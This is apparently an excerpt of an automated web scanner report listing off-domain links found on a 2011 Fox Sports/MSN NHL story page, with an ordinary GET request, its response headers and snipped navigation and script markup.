                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://redacted" class="out-link msn sprite" title="go to redacted"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.redacted/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.redacted/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.redacted/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.redacted/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.redacted/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.redacted/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.redacted/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.redacted/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.redacted/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://money.msn.com/investing" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://money.msn.com/personal-finance" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.redacted/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://money.msn.com/money-video" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.redacted/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.redacted/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.redacted/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.redacted/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.redacted/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.redacted/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.redacted/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.redacted" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link" title="Bing">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportswisconsin.com/msn/01/27/11/Dance-the-Raji/landing.html?blockID=399089&amp;feedID=5059' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Dance party');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Dance party') });location.href=this.href;">
<div id="blurb_0" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/msn/01/28/11/Lack-of-trust-not-lack-of-Bosh-hurts-mos/landing_reiter.html?blockID=399356&amp;feedID=7926' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Not a pretty sight');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Not a pretty sight') });location.href=this.href;">
<div id="blurb_1" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportstennessee.com/msn/01/27/11/Fisher-and-the-Future/landing_titans.html?blockID=399272&amp;feedID=3732' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Rare breed');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Rare breed') });location.href=this.href;">
<div id="blurb_2" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/01/26/11/Heat-are-finding-times-finally-on-their-/landing_reiter.html?blockID=398033&amp;feedID=7926' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Down time');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Down time') });location.href=this.href;">
<div id="blurb_8" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsdetroit.com/01/26/11/MSU-Insider-Spartans-down-not-necessaril/landing.html?blockID=398109&amp;feedID=3701' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Fly away');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Fly away') });location.href=this.href;">
<div id="blurb_11" align="left" class="blurb">
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=4f106944-1cfe-48f1-a72b-63a31c206d93&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=4f106944-1cfe-48f1-a72b-63a31c206d93&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=07820735-2940-48f9-aced-02c46e9a76b5&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=07820735-2940-48f9-aced-02c46e9a76b5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div class="body">
<a title="Video: Who makes the tastiest frozen pizza?" class="main-story" href="http://www.bing.com/videos/watch/video/tastiest-frozen-pizza/q94x07p0?q=Pizza&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr4-1"><img alt="Frozen Pizza, c. Rubberball - Mike Kemp - Getty Images" border="0" height="90" width="90" src="http://blstb.redacted/i/59/A38490AFABAE7E3D494E8243D8FE6.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Bing: Air Force sex conviction" href="http://www.bing.com/search?q=air+force+chief+convicted+sexual+harassment&form=MSNXNM&ocid=xnetr4-2">Bing: Air Force sex conviction</a>
...[SNIP]...
<li>
<a title="PETA's new naked celeb" href="http://specials.msn.com/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762&form=MSNXNM&ocid=xnetr4-3">PETA's new naked celeb</a>
...[SNIP]...
<li>
<a title="What's playing at the movies?" href="http://www.bing.com/entertainment/movies?form=MSNXNM&ocid=xnetr4-4">What's playing at the movies?</a>
...[SNIP]...
</div>


<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3>
                   <a href="http://www.ticketsnow.com/nhl-tickets/" target="_blank" title="NHL Tickets">NHL Tickets</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<h3>
                   <a href="http://www.newscorp.com" title="News Corp.">News Corp.</a>
...[SNIP]...
<h3>
                   <a href="http://www.fox.com" title="FOX">FOX</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<h3>
                   <a href="http://www.fxnetworks.com" title="FX">FX</a>
...[SNIP]...
<h3>
                   <a href="http://www.speedtv.com" title="Speed TV">Speed TV</a>
...[SNIP]...
<h3>
                   <a href="http://www.fuel.tv" title="NCAAFuel TV">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.redacted/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.redacted/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.redacted/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...

22.240. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250970
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=25
Date: Sun, 30 Jan 2011 16:53:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://www.scenedaily.com/" target="_blank" title="Scene Daily">Scene Daily</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/nba-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/golf-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


